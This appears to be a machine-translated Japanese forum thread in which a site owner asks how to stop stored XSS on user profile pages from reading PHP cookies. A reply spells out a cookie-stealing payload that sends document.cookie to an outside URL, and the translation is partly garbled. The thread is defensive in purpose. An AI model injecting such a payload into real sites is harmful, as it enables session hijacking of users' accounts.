私はこのスクリプトでは、訪問者が登録してログインすることができます(ユーザー情報はクッキーに保存されています)...登録後、彼らは自分の個人ページを編集することができます..問題:このページはJavaScriptを受け入れます誰もがdocument.cookieを使ってクッキーを入手できます:(ユーザーのページでJavaScriptからPHP Cookieを保護するにはどうすればよいですか?
ユーザーページからdocument.cookieタグを消去するために正規表現を作成しようとしましたが、ユーザーが以下を置くことができるため、良い解決策ではありません:<script src="filejs.js"></script>
とfilejs .js例えば、このコードalert(document.cookie);
は、このコードはきれいに....
セッションが保存され見つからないだろうが、それは長い時間のために(time()+60*24*300
)を保存していない:(
ありがとうございます。
はい、チャットボックスに保存することはできません。たとえば、次のようにチャットに新しいメッセージを書き込みます。 document.location = "http://yoursite.com/index.php?cookie="+document.cookie ; ユーザーのCookieがサイトに挿入され、そのアカウントにアクセスできます。■ –